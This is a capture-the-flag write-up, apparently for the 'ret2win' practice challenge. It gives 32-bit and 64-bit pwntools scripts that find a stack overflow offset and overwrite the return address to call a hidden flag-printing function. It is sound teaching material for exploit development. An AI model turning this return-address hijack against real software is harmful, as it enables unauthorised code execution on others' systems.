ret2win

ret2win 32bit

Solution

This is a typical ret2text challenge. There is an unused function ret2win located in the .text segment that calls system("/bin/cat flag.txt") for us. This is sometimes called "dead code".

Exploit

#!/usr/bin/env python3
from pwn import *
​
#--------Setup--------#
​
context(arch="i386", os="linux")
elf = ELF("ret2win32", checksec=False)
​
#--------Offset--------#
​
p = elf.process()
pattern = cyclic(1024)
p.sendlineafter("> ", pattern)
p.wait()
core = p.corefile
p.close()
os.remove(core.file.name)
offset = cyclic_find(core.eip)
​
log.info(f"{offset = }")
​
#--------ret2text--------#
​
ret2win = elf.sym["ret2win"]
​
payload = flat(
b"A" * offset,
ret2win,
)
​
p = elf.process()
​
p.sendlineafter("> ", payload)
​
p.interactive()

ret2win 64bit

Solution

The idea is essentially the same as the 32-bit case.

Exploit

#!/usr/bin/env python3
from pwn import *
​
#--------Setup--------#
​
context(arch="amd64", os="linux")
elf = ELF("ret2win", checksec=False)
​
#-------Offset--------#
​
p = elf.process()
pattern = cyclic(1024)
p.sendlineafter("> ", pattern)
p.wait()
core = p.corefile
p.close()
os.remove(core.file.name)
offset = cyclic_find(core.read(core.rsp, 4))
​
log.info(f"{offset = }")
​
#--------ret2text--------#
​
ret2win = elf.sym["ret2win"]
​
payload = flat(
b"A" * offset,
ret2win,
)
​
p = elf.process()
​
p.sendlineafter("> ", payload)
​
p.interactive()
Copy link
Outline
ret2win 32bit
Solution
Exploit
ret2win 64bit
Solution
Exploit